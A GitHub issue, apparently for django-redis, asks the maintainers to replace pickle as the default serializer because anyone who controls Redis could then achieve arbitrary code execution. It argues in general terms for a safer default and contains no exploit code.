Skip to content

Security concerns about pickle for serialization #424

Open
@hartwork

Description

@hartwork

Hi!

Before you hit the close button right away, please hear me out:

I'm aware of #161 but it's at least in part about switching to JSON in particular and I think back then the msgpack serializer was not yet around...

I'm opening this ticket because using pickle means that if someone gets control over Redis that gets them arbitrary code execution in django-redis for free, just because someone didn't think or know of changing the default serializer from pickle to something else. I think it's just too crazy of a default — let's use anything but pickle for a default, please. 🙏

Thanks for your reconsideration!

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions